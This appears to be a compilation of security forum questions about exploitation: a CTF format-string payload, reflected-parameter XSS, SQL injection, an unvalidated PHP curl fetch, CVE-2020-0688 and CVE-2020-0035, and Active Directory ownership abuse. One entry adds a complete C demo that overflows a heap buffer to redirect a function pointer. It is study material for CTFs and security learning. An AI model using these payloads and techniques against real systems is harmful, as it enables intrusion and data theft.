How to send a string format exploit through socket

I’m doing a CTF exercise here:

https://c-wars.acnr.se/download/level2.tgz

There is a Docker container with the vulnerable service, in which I need to find the value of a variable. I was able to do it with the following input:

```
== Login Service 1.0 ==
Username: %7$s
Password: a
Welcome: ACNR{_SERVICE_FLAG_}
```

My issue now is that the submission needs to call a function that is going to send this string over a socket, so I guess I need to escape it. I have tried %7$s, but it didn't work.

Submission format can be found at https://c-wars.acnr.se/download/MANUAL.pdf

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include "gamelib.h"   /* contest library: svc_* helpers */

uint32_t main(uint32_t argc, uint8_t **argv)
{
    svc_init();
    svc_set(10000);
    svc_writeln("gimme flag");   /* placeholder for the payload to send */
    svc_readuntil('}');          /* read until the closing brace of the flag */
    return 0;
}
```

Ways to exploit a form action value when it is reflected from the URI on React-Django

I am working on a security testing project, where I have noticed that the form action of a login page takes whatever is fed to the URI as a parameter. The respective part of the login page is as follows:

```html
<form action="/admin/login/?param=Whateveryouputhere" method="post" id="login-form">
```

Actually, you can even omit the "param"; any value after the question mark will still be reflected. The default value for the param is "/next/", by the way.

How could an attacker exploit it, especially via XSS? I tried to escape the quotation marks but it failed (they are auto-replaced with URL encodings). Does that mean it is safe?

I have also checked the network tab of the browser; no other relevant JS files are loaded except the favicon and Magnific Popup.

Finally, the URL is in the form of site.com/admin/login/?param=value

Unable to exploit SQL injection in a parameter

During my testing I have found a vulnerable parameter in an API (/api/v1/documents/?direction=desc&limit=30&mode=reports&page=1), namely the page=1 at the end. Upon giving a NULL value (&page=) for the parameter, it returns the following error:

```
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 30) AS `UserDocuments` LEFT OUTER JOIN `tasks` AS `Tasks` ON `UserDocuments' at line 1"
```

While if I input a single quote at the end of the value (page=1'), it returns the following error:

```
"Undeclared variable: NaN","sql":"SELECT `UserDocuments`.*, `Tasks`.`id` AS `Tasks.id`, `Tasks`....
```

I have the following questions in mind; I have tried exploiting it but have been unable to do so. How can I exploit this parameter, given that it is returning a syntax error? Also, if it is not exploitable, is it still vulnerable to SQL injection or some other attack?

Please note that it is a GET request and the response is JSON, while the application is developed in PHP.

Is it possible to exploit PHP curl?

I have been working on a project and I wonder if it is possible to exploit the curl_exec function in PHP. Scenario: I have a PHP script that checks a domain for me, but the curl call is not secured. Can it be exploited via the request, e.g. script.php?action=websiteup&token=apikey&target=EVIL CODE HERE? I have googled around but did not find anything that could answer my question; I found some theories but nothing helped me.

Script:

```php
case "websiteup":
    $ch = curl_init($_GET['target']);   // URL comes straight from the request
    curl_setopt_array($ch, array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER     => array(),
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_CUSTOMREQUEST  => "HEAD",
        CURLOPT_REFERER        => $_GET['target'],
        CURLOPT_USERAGENT      => "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36",
    ));
    curl_exec($ch);

    $response['message'] = array(
        "code" => curl_getinfo($ch, CURLINFO_HTTP_CODE),
        "time" => curl_getinfo($ch, CURLINFO_CONNECT_TIME),
    );
```

Any ideas how it can be exploited and secured?

Exploit CVE-2020-0688 for older versions

I wanted to exploit CVE-2020-0688 on my IIS, where I saw that the key is the same as advertised.

The problem is that my IIS is old and uses an AppPool on .NET 2, not .NET 4. Also, I can only use GET, as I don't see a POST request using the ViewState. All the exploits in ysoserial use Microsoft.PowerShell.Editor.dll, which is not loaded in the old version.

Does anyone know a gadget for .NET 2?

How to exploit this C program to call a certain function?

The goal is to call the function foo in the following program:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct object {
    unsigned char buf[36];
    void (*fp)();
};

void baz(struct object *obj, unsigned int num) {
    for (int i = 0; i < num; i++) {      /* i is compared as unsigned */
        unsigned int x;
        scanf("%d", &x);
        if (x == 0) break;
        obj->buf[i] = x & 0x000000ff;    /* no bounds check on i */
    }
}

void foo() {
    // target
}

void bar() {
}

int main() {
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    struct object *obj = malloc(sizeof(struct object));
    memset(obj->buf, 0, 36);
    obj->fp = &bar;

    int num;
    scanf("%d", &num);
    if (num > 36) {          /* a negative num passes this check */
        num = 0;
    } else {
        baz(obj, num);
    }

    for (int i = 0; i < num; i++) {
        printf("%d. \t", i + 1);
        for (int j = 0; j < obj->buf[i]; j++) {
            printf("*");
        }
        puts("");
    }

    obj->fp();
    free(obj);
}
```

My thought was to modify fp in obj (which is called at the end) so that it points to foo instead of bar. By entering a negative number for num, which becomes a large positive number when cast to unsigned int in baz, it should be possible to overwrite fp by overflowing buf in obj. However, this would require the address of foo, which changes every time the program is run.

I would appreciate any ideas or hints to solve this problem.
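The mechanism described in the post, as an added example that is not part of the original question or its program: the same object layout and the same byte-writing loop as baz(), but reading from a constructed in-memory input string instead of stdin so it can be run and checked offline. A negative num passes the `num > 36` check and wraps to a huge unsigned value inside baz, so the loop keeps writing one byte per number past buf[36] until it reaches fp. Two details follow directly from the posted code: fp may not start at offset 36 (on a 64-bit build the pointer is aligned to 8, so offsetof is used rather than a hard-coded 36), and the loop stops on `x == 0` before the `& 0xff` mask, so a zero byte in the address has to be sent as 256. The address of foo is taken from the running process here; resolving it from outside under ASLR, the obstacle the post raises, is not addressed. A little-endian host is assumed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>
#include <stdint.h>

struct object {
    unsigned char buf[36];
    void (*fp)(void);
};

static int foo_called;                 /* set when the target is reached */
static void foo(void) { foo_called = 1; }
static void bar(void) { }

/* Same loop as the post's baz(), but the numbers come from a string
 * (constructed input) rather than stdin. Writes go through a byte
 * pointer to the whole object so the out-of-bounds store is explicit. */
static void baz_from_string(struct object *obj, unsigned int num, const char *input)
{
    unsigned char *raw = (unsigned char *)obj;
    const char *p = input;
    for (unsigned int i = 0; i < num; i++) {
        int x, consumed;
        if (sscanf(p, "%d%n", &x, &consumed) != 1)
            break;                              /* input exhausted */
        p += consumed;
        if (x == 0)
            break;                              /* the post's early exit */
        raw[i] = (unsigned char)(x & 0xff);     /* no bounds check on i */
    }
}

/* Builds the decimal byte list: non-zero filler up to offsetof(fp), then
 * the address bytes little-endian (assumed). A zero byte is sent as 256,
 * which survives the x == 0 check but masks to 0x00. */
static size_t build_input(char *out, size_t outlen, void (*target)(void))
{
    size_t fp_off = offsetof(struct object, fp);
    uintptr_t addr = (uintptr_t)target;
    size_t n = 0;
    for (size_t i = 0; i < fp_off; i++)
        n += (size_t)snprintf(out + n, outlen - n, "1 ");
    for (size_t i = 0; i < sizeof addr; i++) {
        unsigned b = (unsigned)((addr >> (8 * i)) & 0xff);
        n += (size_t)snprintf(out + n, outlen - n, "%u ", b ? b : 256u);
    }
    return n;
}

/* Mirrors main() from the post with num = -1: returns 1 if fp was
 * redirected to foo and foo actually ran through the indirect call. */
int run_demo(void)
{
    struct object *obj = malloc(sizeof *obj);
    if (!obj)
        return 0;
    memset(obj->buf, 0, 36);
    obj->fp = bar;
    foo_called = 0;

    char input[512];
    build_input(input, sizeof input, foo);

    int num = -1;                 /* negative: passes num > 36, wraps in baz */
    if (num > 36)
        num = 0;
    else
        baz_from_string(obj, (unsigned int)num, input);

    int overwritten = (obj->fp == foo);
    obj->fp();
    free(obj);
    return overwritten && foo_called;
}

int main(void)
{
    printf("offsetof(fp) = %zu, foo reached: %s\n",
           offsetof(struct object, fp), run_demo() ? "yes" : "no");
    return 0;
}
```

The printing loop in the post is skipped for num = -1 (`i < num` is false for a signed i), which is why the input only needs enough numbers to reach the end of fp; once the string runs out, sscanf fails and the loop ends.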

How to exploit CVE-2020-0035 on Android

I have some issues with this CVE. Firstly, I can see that there is a permission issue in TelephonyProvider.java which causes some information disclosure.

I have tried to use Frida to exploit this CVE; however, I cannot find the TelephonyProvider class.

Next, I tried to create an application, but I cannot import the android.provider.Telephony.TelephonyProvider class. (I read through the code that Google provides; they manage to import it.)

Links:
https://source.android.com/security/bulletin/2020-03-01
https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/099c68c403c470aaafd3a0f7d4bdf69c873d4740

How to exploit a user which I own according to BloodHound?

During a pentest, I succeeded in compromising a user with low privileges. As this is a domain user, I decided to run BloodHound with its credentials to check whether there is a path from this user to Domain Admins.

I have the Owns privilege on another Active Directory account, which means I should be able to change its attributes, such as userPassword, which I did using ldp.exe. Unfortunately, Active Directory does not seem to allow authentication based on this LDAP attribute, so I needed to find something else.

I would like to use the MMC Active Directory Users and Computers snap-in, but I need to be logged in as a domain member, which I can't, as I would need to join my PC to the domain (I prefer not to do so).

Which tool can I use to act as/impersonate this user I am supposed to own?

Many thanks.

PNG/JPG exploit

So I recently stumbled on multiple cases suggesting there is a JPG/PNG exploit which is able to silently execute malicious code when simply viewing the image. Just looking for some insight as to whether this vulnerability requires the user to open the PNG or just simply "view" it.

Videos showing a PoC:

https://www.youtube.com/watch?v=LsJFJkj8uiY (Discord to distribute)
https://www.youtube.com/watch?v=1x6CLoKySoQ (Gmail to distribute)

In the above videos the malicious code executes from just viewing the image inside your browser, not even downloading and opening it locally. I mean, if this is the case and I'm interpreting this correctly, then surely in its current state the internet is "gg"; in basic terms, don't open your browser, lol?

How do programmers write exploits from a CVE with no known Metasploit exploit?

Please don't just tell me to go read the book "A Bug Hunter's Diary". I've noticed that lots of CVEs at www.cvedetails.com do not have publicly available exploits, but they have high scores (e.g. more than 9). With such a high score, I'd have thought exploits would be readily available, but that's not the case (they are not even present in Exploit-DB).

So how would a hacker, basically, write exploit code from the description at www.cvedetails.com? Do hackers even bother to do that?